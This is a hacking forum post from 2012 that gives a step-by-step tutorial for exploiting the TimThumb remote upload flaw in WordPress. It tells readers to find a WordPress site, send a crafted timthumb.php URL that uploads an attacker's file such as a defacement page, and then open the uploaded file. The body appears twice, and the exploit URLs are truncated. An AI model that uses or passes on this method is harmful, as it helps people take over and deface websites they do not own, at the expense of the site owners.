Timthumb Remote Upload Vuln in Wordpress 05-18-2012, 09:13 PM
#1
Hello guys, I'm back with another hacking tutorial for you, This tutorial about "TimThumb" vuln in Wordpress websites.
![[Image: wordpress.png]](http://cdn4.iconfinder.com/data/icons/socialsketches/128/wordpress.png)
This bug known as "timthumb.php" exploit
First we need to find website, running on the wordpress platform and exploit is
http://wordpresssite.com/wp-content/plug...fileformat
If you need example, Here we go.
http://wordpresssite.com/wp-content/plug...eface.html
After done with this url that file will remotely upload to that wordpress website. After uploading, Go to below link to access your file
http://wordpresssite.com/wp-content/plug...urfilehere
(File will upload with a random name like fe051145b78d04cb3345cff7e1b3cf05b77, Check last file to view your file)
If you have any problem, Ask it in here
This bug known as "timthumb.php" exploit
First we need to find website, running on the wordpress platform and exploit is
http://wordpresssite.com/wp-content/plug...fileformat
If you need example, Here we go.
http://wordpresssite.com/wp-content/plug...eface.html
After done with this url that file will remotely upload to that wordpress website. After uploading, Go to below link to access your file
http://wordpresssite.com/wp-content/plug...urfilehere
(File will upload with a random name like fe051145b78d04cb3345cff7e1b3cf05b77, Check last file to view your file)
If you have any problem, Ask it in here



![[+]](https://sinister.li/images/modern/collapse_collapsed.png)